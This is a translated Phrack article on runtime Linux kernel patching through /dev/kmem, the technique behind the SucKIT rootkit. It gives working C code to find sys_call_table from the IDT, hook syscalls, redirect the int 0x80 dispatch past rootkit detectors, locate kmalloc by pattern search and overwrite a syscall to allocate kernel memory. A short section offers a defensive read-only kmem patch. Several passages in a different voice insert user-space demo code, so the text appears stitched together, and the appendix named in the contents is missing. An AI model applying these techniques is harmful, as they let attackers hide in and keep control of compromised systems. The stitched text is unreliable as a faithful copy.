Linux on-the-fly kernel patching without LKM
Written by : sd
First published on : Phrack
Translated by : drinkey
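Table of contents
1 - Introduction
2 - /dev/kmem is our friend
3 - Replacing kernel syscalls, sys_call_table[]
3.1 - How to get sys_call_table[] without LKM
3.2 - Redirecting int 0x80 call sys_call_table[eax] dispatch
4 - Allocating kernel space without help of LKM support
4.1 - Searching for kmalloc() using LKM support
4.2 - Pattern search of kmalloc()
4.3 - The GFP_KERNEL value
4.4 - Overwriting a syscall
5 - What you should take care of
6 - Possible solutions
7 - Conclusion
8 - References
9 - Appendix: SucKIT: The implementation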
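1 - Introduction
First of all, we should thank Silvio Cesare, who developed the kernel-patching technique a long time ago; most of my ideas are stolen from him :)
In this article we discuss how to abuse the Linux kernel (mostly its syscalls) without help from module support or System.map. We assume that the reader knows what an LKM is, how an LKM is loaded into the kernel, and so on. If you are not sure, read some other documentation first.
Imagine a scenario: a poor man needs to change some interesting Linux syscalls, and LKM support is not compiled into the kernel. He has a box and he has root on it, but the admin is paranoid: the man's patched sshd has been disabled, and everyone's favourite LKM rootkit cannot be compiled because the box lacks the necessary gcc compiler, libraries and header files.
Here are some solutions, explained step by step. At the end of the article there is also a fully working linux-ia32 rootkit, an example/tool that implements all the techniques discussed here.
Most of the things described here (syscalls, memory addresses, code) have been tested only on the ia32 architecture.
2 - /dev/kmem is our friend
In short, everything we do to kernel space in this article goes through the standard Linux device /dev/kmem. Since this device is most likely +rw only for root, you must be root if you want to abuse it. Note that changing the permissions of /dev/kmem is not enough to gain access: after the VFS has allowed access to /dev/kmem, there is a second check in drivers/char/mem.c for the CAP_SYS_RAWIO capability.
We should also mention another device, /dev/mem. It represents physical memory before virtual address translation. If we knew the location of the page directory, it might be possible to patch the kernel through this device as well. We do not investigate that possibility in this article.
Selecting an address, reading and writing are done in code with lseek(), read() and write() respectively. It is very simple: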
/* read size bytes at kernel address offset into buf; returns size, 0 on failure */
static inline int rkm(int fd, int offset, void *buf, int size)
{
    if (lseek(fd, offset, SEEK_SET) != offset) return 0;
    if (read(fd, buf, size) != size) return 0;
    return size;
}

/* write size bytes from buf to kernel address offset; returns size, 0 on failure */
static inline int wkm(int fd, int offset, void *buf, int size)
{
    if (lseek(fd, offset, SEEK_SET) != offset) return 0;
    if (write(fd, buf, size) != size) return 0;
    return size;
}

/* read one ulong from kmem */
static inline int rkml(int fd, int offset, ulong *buf)
{
    return rkm(fd, offset, buf, sizeof(ulong));
}

/* write one ulong to kmem */
static inline int wkml(int fd, int offset, ulong buf)
{
    return wkm(fd, offset, &buf, sizeof(ulong));
}
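The seek-then-transfer pattern used by these helpers is not specific to /dev/kmem, so it can be tried safely on an ordinary file. The following is only a sketch under that assumption: read_at(), write_at() and demo_roundtrip() are hypothetical names that do not appear in the original code, the scratch path under /tmp is made up, and off_t/size_t replace the int parameters.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* Read `size` bytes at `offset`; returns size on success, 0 on failure. */
static int read_at(int fd, off_t offset, void *buf, size_t size)
{
    assert(buf != NULL);
    if (lseek(fd, offset, SEEK_SET) != offset) return 0;
    if (read(fd, buf, size) != (ssize_t)size) return 0;
    return (int)size;
}

/* Write `size` bytes at `offset`; returns size on success, 0 on failure. */
static int write_at(int fd, off_t offset, const void *buf, size_t size)
{
    assert(buf != NULL);
    if (lseek(fd, offset, SEEK_SET) != offset) return 0;
    if (write(fd, buf, size) != (ssize_t)size) return 0;
    return (int)size;
}

/* Write one word at offset 16 of a scratch file and read it back.
   Returns 1 if the value survives the round trip, 0 otherwise. */
static int demo_roundtrip(void)
{
    char path[64];
    unsigned int out = 0xc01e0f18u, in = 0;
    int fd, ok;

    /* hypothetical scratch file; O_EXCL refuses to reuse an existing one */
    snprintf(path, sizeof(path), "/tmp/rkm_demo.%ld", (long)getpid());
    fd = open(path, O_RDWR | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return 0;
    unlink(path);               /* the file goes away once fd is closed */

    ok = write_at(fd, 16, &out, sizeof(out)) == (int)sizeof(out)
      && read_at(fd, 16, &in, sizeof(in)) == (int)sizeof(in)
      && in == out;
    close(fd);
    return ok;
}
```

Like rkm() and wkm(), both helpers treat a short read or write as a failure, which keeps the callers free of partial-transfer handling.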
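3 - Replacing kernel syscalls, sys_call_table[]
As we all know, syscalls are the lowest-level system functions in Linux as seen from user space, so they are what interests us most. Syscalls are grouped together in sys_call_table[] (sct), a one-dimensional array of 256 pointers (on ia32) that is indexed by syscall number and gives the entry point of each syscall. That's it. Here is an example in pseudocode: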
/* saved pointer to the original syscall */
int (*old_write) (int, char *, int);

/* new syscall handler */
new_write(int fd, char *buf, int count) {
    if (fd == 1) {      /* stdout? */
        old_write(fd, "Hello world!\n", 13);
        return count;
    } else {
        return old_write(fd, buf, count);
    }
}

old_write = (void *) sys_call_table[__NR_write];   /* save the old entry */
sys_call_table[__NR_write] = (ulong) new_write;    /* install the new one */
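Code like this is commonly found in LKM rootkits and tty sniffers/hijackers, where we are guaranteed to be able to import sys_call_table[] and manipulate it correctly. In other words, the symbol is simply imported for us by /sbin/insmod [using create_module() / init_module()].
Okay, let's stop here; I think this is clear to everyone.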
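The table-of-pointers idea can be tried entirely in user space. The sketch below is only an illustration, not kernel code: demo_table[], demo_write(), dispatch(), install_hook(), the slot number and the demo_sink buffer are all invented stand-ins, and nothing here touches the real sys_call_table[].

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define NR_DEMO_WRITE   4   /* hypothetical slot number, illustration only */
#define DEMO_TABLE_SIZE 8

typedef int (*demo_call_t)(int fd, const char *buf, int count);

static char demo_sink[64];  /* stands in for the output device */

/* the "original syscall": copies the data into demo_sink */
static int demo_write(int fd, const char *buf, int count)
{
    (void)fd;
    assert(buf != NULL);
    if (count < 0 || count >= (int)sizeof(demo_sink)) return -1;
    memcpy(demo_sink, buf, (size_t)count);
    demo_sink[count] = '\0';
    return count;
}

static demo_call_t demo_table[DEMO_TABLE_SIZE] = {
    [NR_DEMO_WRITE] = demo_write
};
static demo_call_t old_write;   /* saved original entry */

/* the replacement handler, same logic as the pseudocode above */
static int new_write(int fd, const char *buf, int count)
{
    if (fd == 1) {
        old_write(fd, "Hello world!\n", 13);
        return count;           /* report the caller's length */
    }
    return old_write(fd, buf, count);
}

/* save the old entry, then point the slot at the new handler */
static void install_hook(void)
{
    old_write = demo_table[NR_DEMO_WRITE];
    demo_table[NR_DEMO_WRITE] = new_write;
}

/* index the table by call number, as the int $0x80 handler does */
static int dispatch(int nr, int fd, const char *buf, int count)
{
    if (nr < 0 || nr >= DEMO_TABLE_SIZE || demo_table[nr] == NULL) return -1;
    return demo_table[nr](fd, buf, count);
}
```

After install_hook(), a dispatch() on slot NR_DEMO_WRITE with fd 1 leaves "Hello world!\n" in demo_sink, while any other fd passes the caller's data through unchanged.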
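3.1 - How to get sys_call_table[] without LKM
First, note that the Linux kernel keeps no symbol information at all when LKM support is not compiled in. That is a sensible decision: who would need the symbols without LKM support? For debugging? There is System.map for that. Of course, WE need the symbols :). With LKM support, the symbols intended for modules are exported in a special linker section. But, as we said, there is no LKM support, so what now?
As far as I know, the most reliable way to obtain sys_call_table[] is the following: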
#define _GNU_SOURCE     /* for memmem() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

struct {
    unsigned short limit;
    unsigned int base;
} __attribute__((packed)) idtr;

struct {
    unsigned short off1;
    unsigned short sel;
    unsigned char none, flags;
    unsigned short off2;
} __attribute__((packed)) idt;

int kmem;

void readkmem(void *m, unsigned off, int sz)
{
    if (lseek(kmem, off, SEEK_SET) != off) {
        perror("kmem lseek");
        exit(2);
    }
    if (read(kmem, m, sz) != sz) {
        perror("kmem read");
        exit(2);
    }
}

#define CALLOFF 100     /* we read the first 100 bytes of int $0x80 */

int main(void)
{
    unsigned sys_call_off;
    unsigned sct;
    char sc_asm[CALLOFF], *p;

    /* ask the processor for the interrupt descriptor table */
    asm ("sidt %0" : "=m" (idtr));
    printf("idtr base at 0x%X\n", (int)idtr.base);

    /* open kmem */
    kmem = open("/dev/kmem", O_RDONLY);
    if (kmem < 0) return 1;

    /* read the descriptor of vector 0x80 from the IDT */
    readkmem(&idt, idtr.base + 8*0x80, sizeof(idt));
    sys_call_off = (idt.off2 << 16) | idt.off1;
    printf("idt80: flags = %X sel = %X off = %X\n",
           (unsigned)idt.flags, (unsigned)idt.sel, sys_call_off);

    /* look for the indirect call through the syscall table */
    readkmem(sc_asm, sys_call_off, CALLOFF);
    p = (char *)memmem(sc_asm, CALLOFF, "\xff\x14\x85", 3);
    if (p) {
        sct = *(unsigned *)(p + 3);
        printf("sys_call_table at 0x%x, call dispatch at 0x%x\n",
               sct, sys_call_off + (unsigned)(p - sc_asm));
    }
    close(kmem);
    return 0;
}
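How does this code work? The sidt instruction asks the processor for the interrupt descriptor table [asm ("sidt %0" : "=m" (idtr));]. From this structure we get a pointer to the interrupt descriptor of int $0x80 [readkmem (&idt,idtr.base+8*0x80,sizeof(idt));].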
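From the IDT entry we can compute the address of the int $0x80 entry point [sys_call_off = (idt.off2 << 16) | idt.off1;]. Good, now we know where int $0x80 starts, but that is not yet our beloved sys_call_table[]. Let's take a look at the int $0x80 entry point (translator's note: kernel symbol addresses can be looked up by disassembling the kernel image vmlinux):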
[sd@pikatchu linux]$ gdb -q /usr/src/linux/vmlinux
(no debugging symbols found)...(gdb) disass system_call
Dump of assembler code for function system_call:
0xc0106bc8 <system_call>: push %eax
0xc0106bc9 <system_call+1>: cld
0xc0106bca <system_call+2>: push %es
0xc0106bcb <system_call+3>: push %ds
0xc0106bcc <system_call+4>: push %eax
0xc0106bcd <system_call+5>: push %ebp
0xc0106bce <system_call+6>: push %edi
0xc0106bcf <system_call+7>: push %esi
0xc0106bd0 <system_call+8>: push %edx
0xc0106bd1 <system_call+9>: push %ecx
0xc0106bd2 <system_call+10>: push %ebx
0xc0106bd3 <system_call+11>: mov $0x18,%edx
0xc0106bd8 <system_call+16>: mov %edx,%ds
0xc0106bda <system_call+18>: mov %edx,%es
0xc0106bdc <system_call+20>: mov $0xffffe000,%ebx
0xc0106be1 <system_call+25>: and %esp,%ebx
0xc0106be3 <system_call+27>: cmp $0x100,%eax
0xc0106be8 <system_call+32>: jae 0xc0106c75 <badsys>
0xc0106bee <system_call+38>: testb $0x2,0x18(%ebx)
0xc0106bf2 <system_call+42>: jne 0xc0106c48 <tracesys>
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4) <-- that's it
0xc0106bfb <system_call+51>: mov %eax,0x18(%esp,1)
0xc0106bff <system_call+55>: nop
End of assembler dump.
(gdb) print &sys_call_table
$1 = (<data variable, no debug info> *) 0xc01e0f18 <-- see? it's the same
(gdb) x/xw (system_call+44)
0xc0106bf4 <system_call+44>: 0x188514ff <-- opcode (little endian)
(gdb)
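In short, it is enough to find the machine code of the 'call sys_call_table(,eax,4)' instruction near the int $0x80 entry point (system_call), because this indirect call has not changed in kernel versions 2.0.10 through 2.4.10. Searching for the pattern 'call <something>(,eax,4)' is therefore relatively safe:
opcode = 0xff 0x14 0x85 0x<address_of_table>
[memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);]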
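The search and the operand extraction can be exercised on a plain byte buffer. The sketch below is an illustration under stated assumptions: find_dispatch() and sample_code[] are hypothetical names, the search is a plain loop rather than memmem() so that no GNU extension is needed, and the sample bytes were assembled by hand from the disassembly above (the bytes of the call instruction are confirmed by the x/xw output; the neighbouring instructions are my own encoding).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Look for "ff 14 85 <addr32>" (call *addr(,%eax,4)) in code[0..len).
   On success stores the little-endian operand in *table and returns the
   offset of the instruction; returns -1 if no complete match exists. */
static int find_dispatch(const unsigned char *code, size_t len, uint32_t *table)
{
    size_t i;

    assert(code != NULL && table != NULL);
    /* i + 7 <= len: opcode (3 bytes) plus operand (4 bytes) must fit */
    for (i = 0; i + 7 <= len; i++) {
        if (code[i] == 0xff && code[i + 1] == 0x14 && code[i + 2] == 0x85) {
            *table = (uint32_t)code[i + 3]
                   | ((uint32_t)code[i + 4] << 8)
                   | ((uint32_t)code[i + 5] << 16)
                   | ((uint32_t)code[i + 6] << 24);
            return (int)i;
        }
    }
    return -1;
}

/* Hand-assembled tail of system_call, starting at system_call+38. */
static const unsigned char sample_code[] = {
    0xf6, 0x43, 0x18, 0x02,                     /* testb $0x2,0x18(%ebx)    */
    0x75, 0x54,                                 /* jne   tracesys           */
    0xff, 0x14, 0x85, 0x18, 0x0f, 0x1e, 0xc0,   /* call  *0xc01e0f18(,%eax,4) */
    0x89, 0x44, 0x24, 0x18,                     /* mov   %eax,0x18(%esp,1)  */
    0x90                                        /* nop                      */
};
```

Unlike the one-liner with memmem(), this version refuses a match whose 4-byte operand would run past the end of the buffer, which matters when the pattern happens to sit in the last few of the CALLOFF bytes.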
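There is also a more robust approach: simply redirect the whole int $0x80 handler in the IDT to our own fake handler and intercept the interesting calls there. That gets a bit more complicated, though, because we would have to handle reentrancy.
At this point we know where sys_call_table[] is, so we can change the addresses of some syscalls. Pseudocode: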
readkmem(&old_write, sct + __NR_write * 4, 4);
writekmem(new_write, sct + __NR_write * 4, 4);
3.2 - Redirecting int 0x80 call sys_call_table[eax] dispatch
While writing this article, we found some "rootkit detectors" on Packetstorm/Freshmeat. They are able to detect that something is wrong with an LKM, the syscall table or other kernel internals. Fortunately, most of them are too stupid and can be fooled by the trick introduced in [6] by SpaceWalker:
Pseudocode:
ulong sct = addr of sys_call_table[]
char *p = ptr to int 0x80's call sct(,eax,4) - dispatch
ulong nsct[256] = new syscall table with modified entries
readkmem(nsct, sct, 1024); /* read old */
old_write = nsct[__NR_write];
nsct[__NR_write] = new_write;
/* replace dispatch to our new sct */
writekmem((ulong) p+3, nsct, 4);
/* Note that this code never can work, because you can't
redirect something kernel related to userspace, such as
sct[] in this case */
Background:
We create a copy of the original sys_call_table[] [readkmem(nsct, sct, 1024);], then we will modify entries which we're interested in [old_write = nsct[__NR_write]; nsct[__NR_write] = new_write;] and then change _only_ addr of <something> in the call <something>(,eax,4):
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4)
                                   ~~~~|~~~~~
                                       |__ Here will be address of
                                           _our_ sct[]
LKM detectors (which do not check the consistency of int $0x80) won't see anything: sys_call_table[] is unchanged, but int $0x80 uses our implanted table.
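The copy-and-redirect idea can be modelled in user space with two arrays and one pointer. This is a toy model, not kernel code: real_table[], shadow_table[], active_table, the slot number and both handlers are invented for the illustration, and active_table merely plays the role of the operand in call <something>(,eax,4).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define DEMO_NR   4
#define DEMO_SLOT 2     /* hypothetical entry number */

typedef int (*demo_fn)(int);

static int orig_handler(int x)   { return x + 1; }
static int hooked_handler(int x) { return x + 100; }

/* the table a detector would inspect */
static demo_fn real_table[DEMO_NR] = { [DEMO_SLOT] = orig_handler };
/* our private copy */
static demo_fn shadow_table[DEMO_NR];
/* what the dispatcher actually indexes */
static demo_fn *active_table = real_table;

/* copy the table, patch only the copy, then switch the dispatcher over */
static void redirect_dispatch(void)
{
    memcpy(shadow_table, real_table, sizeof(real_table));
    shadow_table[DEMO_SLOT] = hooked_handler;
    active_table = shadow_table;
}

static int dispatch(int nr, int arg)
{
    assert(active_table != NULL);
    if (nr < 0 || nr >= DEMO_NR || active_table[nr] == NULL) return -1;
    return active_table[nr](arg);
}
```

After redirect_dispatch() the dispatcher reaches hooked_handler, yet real_table[DEMO_SLOT] still holds orig_handler, which is exactly why a checker that only compares the original table sees nothing.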
4 - Allocating kernel space without help of LKM support
The next thing we need is a memory page above the 0xc0000000 (or 0x80000000) address.
The 0xc0000000 value is the demarcation point between user and kernel memory. User processes have no access above this limit. Keep in mind that this value is not fixed and may differ between systems, so it is a good idea to figure out the limit on the fly (from the int $0x80 entry point). Well, how do we get our page above the limit? Let's take a look at how the regular kernel LKM support does it (/usr/src/linux/kernel/module.c):
...
void inter_module_register(const char *im_name, struct module *owner,
                           const void *userdata)
{
    struct list_head *tmp;
    struct inter_module_entry *ime, *ime_new;
    if (!(ime_new = kmalloc(sizeof(*ime), GFP_KERNEL))) {
        /* Overloaded kernel, not fatal */
...
As we expected, they used kmalloc(size, GFP_KERNEL) ! But we can't use kmalloc() yet because:
* We don't know the address of kmalloc() [ paragraph 4.1, 4.2 ]
* We don't know the value of GFP_KERNEL [ paragraph 4.3 ]
* We can't call kmalloc() from user-space [ paragraph 4.4 ]
4.1 - Searching for kmalloc() using LKM support
If we can use LKM support:
/* kmalloc() lookup */
/* simplest & safest way, but only if LKM support is there */
ulong get_sym(char *n) {
    struct kernel_sym tab[MAX_SYMS];
    int numsyms;
    int i;

    numsyms = get_kernel_syms(NULL);
    if (numsyms > MAX_SYMS || numsyms < 0) return 0;
    get_kernel_syms(tab);
    for (i = 0; i < numsyms; i++) {
        if (!strncmp(n, tab[i].name, strlen(n)))
            return tab[i].value;
    }
    return 0;
}

ulong get_kma(ulong pgoff)
{
    ulong ret = get_sym("kmalloc");
    if (ret) return ret;
    return 0;
}
We leave this without comments.
4.2 - Pattern search of kmalloc()
But if LKM support is not there, we're getting into trouble. The solution is quite dirty and not so good, by the way, but it seems to work. We walk through the kernel's .text section and look for patterns such as:
    push GFP_KERNEL <something between 0-0xffff>
    push size <something between 0-0x1ffff>
    call kmalloc
All hits are gathered into a table and counted, and the function that is called most often is taken to be our kmalloc(). Here is the code:
/* kmalloc() lookup */
#define RNUM 1024
ulong get_kma(ulong pgoff)
{
    struct { uint a,f,cnt; } rtab[RNUM], *t;
    uint i, a, j, push1 = 0, push2 = 0;
    uint found = 0, total = 0;
    uchar buf[0x10010], *p;
    int kmem;
    ulong ret;

    /* uhh, before we try to brute something, attempt to do things
       in the *right* way ;)) */
    ret = get_sym("kmalloc");
    if (ret) return ret;

    /* humm, no way ;)) */
    kmem = open(KMEM_FILE, O_RDONLY, 0);
    if (kmem < 0) return 0;
    for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000);
         i += 0x10000) {
        if (!loc_rkm(kmem, buf, i, sizeof(buf))) {
            close(kmem);
            return 0;
        }
        /* loop over memory block looking for push and calls */
        for (p = buf; p < buf + 0x10000;) {
            switch (*p++) {
                case 0x68:      /* push imm32 */
                    push1 = push2;
                    push2 = *(unsigned*)p;
                    p += 4;
                    continue;
                case 0x6a:      /* push imm8 */
                    push1 = push2;
                    push2 = *p++;
                    continue;
                case 0xe8:      /* call rel32 */
                    if (push1 && push2 &&
                        push1 <= 0xffff &&
                        push2 <= 0x1ffff) break;
                    /* not a candidate: fall through and reset */
                default:
                    push1 = push2 = 0;
                    continue;
            }
            /* we have push1/push2/call seq; get address */
            a = *(unsigned *) p + i + (p - buf) + 4;
            p += 4;
            total++;
            /* find in table */
            for (j = 0, t = rtab; j < found; j++, t++)
                if (t->a == a && t->f == push1) break;
            if (j < found)
                t->cnt++;
            else
                if (found >= RNUM) {
                    close(kmem);
                    return 0;
                }
                else {
                    found++;
                    t->a = a;
                    t->f = push1;
                    t->cnt = 1;
                }
            push1 = push2 = 0;
        } /* for (p = buf; ... */
    } /* for (i = (pgoff + 0x100000) ...*/
    close(kmem);
    t = NULL;
    for (j = 0; j < found; j++) /* find a winner */
        if (!t || rtab[j].cnt > t->cnt) t = rtab+j;
    if (t) return t->a;
    return 0;
}
The code above is a simple state machine and doesn't bother with potentially different asm code layouts (for example when exotic GCC options are used). It could be extended to understand other code patterns (see the switch statement) and made more accurate by checking the GFP value in the PUSHes against known values (see the paragraph below).
The accuracy of this code is about 80% (i.e. in about 80% of cases it points to kmalloc, in 20% to some junk), and it seems to work on kernels 2.2.1 through 2.4.13.
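The address computation in the scanner (a = *(unsigned *) p + i + (p - buf) + 4) is ordinary rel32 arithmetic: the target of a near call is the address of the following instruction plus the signed 32-bit displacement. A stand-alone sketch of just that step follows; call_target() is a hypothetical helper and the addresses in the usage note are made up.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Decode "e8 <rel32>" located at virtual address `addr`.
   Stores the call target in *target and returns 1, or returns 0 if the
   first byte is not the near-call opcode. */
static int call_target(const unsigned char *insn, uint32_t addr, uint32_t *target)
{
    uint32_t rel;

    assert(insn != NULL && target != NULL);
    if (insn[0] != 0xe8) return 0;
    rel = (uint32_t)insn[1]
        | ((uint32_t)insn[2] << 8)
        | ((uint32_t)insn[3] << 16)
        | ((uint32_t)insn[4] << 24);
    /* the instruction is 5 bytes long; unsigned arithmetic wraps modulo
       2^32, so negative displacements come out right as well */
    *target = addr + 5 + rel;
    return 1;
}
```

For example, the bytes e8 34 12 00 00 at the made-up address 0xc0120000 call 0xc0121239, and e8 f0 ff ff ff (displacement -16) at 0xc0120010 calls back to 0xc0120005. In the article's loop p already points past the opcode byte, which is why it adds 4 instead of 5.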
4.3 - The GFP_KERNEL value
The next problem with kmalloc() is that the value of GFP_KERNEL varies between kernel series, but we can work around that with the help of uname():
+-----------------------------------+
| kernel version | GFP_KERNEL value |
+----------------+------------------+
| 1.0.x .. 2.4.5 | 0x3 |
+----------------+------------------+
| 2.4.6 .. 2.4.x | 0x1f0 |
+----------------+------------------+
Note that there are some problems with 2.4.7-2.4.9 kernels, which sometimes crash due to a bad GFP_KERNEL value, simply because the table above is not exact; it only shows values we CAN use.
The code:
#define NEW_GFP 0x1f0
#define OLD_GFP 0x3

/* uname struc */
struct un {
    char sysname[65];
    char nodename[65];
    char release[65];
    char version[65];
    char machine[65];
    char domainname[65];
};

int get_gfp()
{
    struct un s;

    uname(&s);
    /* release looks like "2.4.x": new value for 2.4.6 and later,
       including two-digit patch levels such as 2.4.13 */
    if ((s.release[0] == '2') && (s.release[2] == '4') &&
        (s.release[4] >= '6' ||
        (s.release[5] >= '0' && s.release[5] <= '9'))) {
        return NEW_GFP;
    }
    return OLD_GFP;
}
4.4 - Overwriting a syscall
As we mentioned above, we can't call kmalloc() from user space directly. The solution is Silvio's trick [2] of replacing a syscall:
* Get address of some syscall (IDT -> int 0x80 -> sys_call_table)
* Create a small routine which will call kmalloc() and return pointer to allocated page
* Save sizeof(our_routine) bytes of some syscall
* Overwrite code of some syscall by our routine
* Call this syscall from userspace thru int $0x80, so our routine will operate in kernel context and can call kmalloc() for us passing out the address of allocated memory as return value.
* Restore code of some syscall with saved bytes (in step 3.)
our_routine may look something like this:
struct kma_struc {
    ulong (*kmalloc) (uint, int);
    int size;
    int flags;
    ulong mem;
} __attribute__ ((packed));

int our_routine(struct kma_struc *k)
{
    k->mem = k->kmalloc(k->size, k->flags);
    return 0;
}
In this case we directly pass needed info to our routine.
Now we have kernel memory, so we can copy our handling routines there, point entries in fake sys_call_table to them, infiltrate this fake table into int $0x80 and enjoy the ride :)
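The point of kma_struc is that everything the routine needs, including the address of the allocator itself, travels through a single pointer argument, and the result comes back through the same structure. The calling convention can be tried in user space with malloc() standing in for kmalloc(). Everything below is a hypothetical stand-in for illustration: kma_demo, demo_alloc(), our_routine_demo() and last_flags are invented, and the flags value is only recorded, not interpreted.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* user-space analogue of kma_struc */
struct kma_demo {
    void *(*alloc)(size_t size, int flags);  /* stands in for kmalloc */
    size_t size;
    int flags;
    void *mem;                               /* result is stored here */
};

static int last_flags;  /* lets us observe what the allocator was given */

static void *demo_alloc(size_t size, int flags)
{
    last_flags = flags;
    return malloc(size);
}

/* same shape as our_routine(): one pointer in, result written back */
static int our_routine_demo(struct kma_demo *k)
{
    assert(k != NULL && k->alloc != NULL);
    k->mem = k->alloc(k->size, k->flags);
    return 0;
}
```

A caller fills in alloc, size and flags, invokes the routine and then reads mem, which mirrors how the overwritten syscall hands the allocated address back to user space.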
5 - What you should take care of
It would be a good idea to follow these rules when writing something that uses this technique:
* Take care of kernel versions (We mean GFP_KERNEL).
* Play _only_ with syscalls, _do not_ use any internal kernel structures including task_struct, if you want to stay portable between kernel series.
* SMP may cause some trouble; remember to take care of reentrancy and, where it is needed, use user-space locks [ src/core.c#ualloc() ]
6 - Possible solutions
Okay, now from the good man's point of view. You would probably like to defeat attacks by kids using such annoying toys. In that case you should apply the following kmem read-only patch and disable LKM support in your kernel.
<++> kmem-ro.diff
--- /usr/src/linux/drivers/char/mem.c Mon Apr 9 13:19:05 2001
+++ /usr/src/linux/drivers/char/mem.c Sun Nov 4 15:50:27 2001
@@ -49,6 +51,8 @@
                 const char * buf, size_t count, loff_t *ppos)
 {
     ssize_t written;
+    /* disable kmem write */
+    return -EPERM;
     written = 0;
 #if defined(__sparc__) || defined(__mc68000__)
<-->
Note that this patch can cause trouble in conjunction with some old utilities which depend on the ability to write to /dev/kmem. That's the price of security.
7 - Conclusion
The raw memory I/O devices in Linux seem to be pretty powerful. Attackers (with root privileges, of course) can use them to hide their actions, steal information, grant remote access and so on for a long time without being noticed. As far as we know, these devices are rarely used for writing, so it may be a good idea to disable their write ability.
8 - References
[1] Silvio Cesare's homepage, pretty good info about low-level linux stuff
    [http://www.big.net.au/~silvio]
[2] Silvio's article describing run-time kernel patching (System.map)
    [http://www.big.net.au/~silvio/runtime-kernel-kmem-patching.txt]
[3] QuantumG's homepage, mostly virus related stuff
    [http://biodome.org/~qg]
[4] "Abuse of the Linux Kernel for Fun and Profit" by halflife
    [Phrack issue 50, article 05]
[5] "(nearly) Complete Linux Loadable Kernel Modules. The definitive guide
    for hackers, virus coders and system administrators."
    [http://www.thehackerschoice.com/papers]
Finally, I (sd) would like to thank devik for helping me a lot with this crap, Reaction for the usual spelling checks, and an anonymous editor's friend who improved the quality of the article a lot.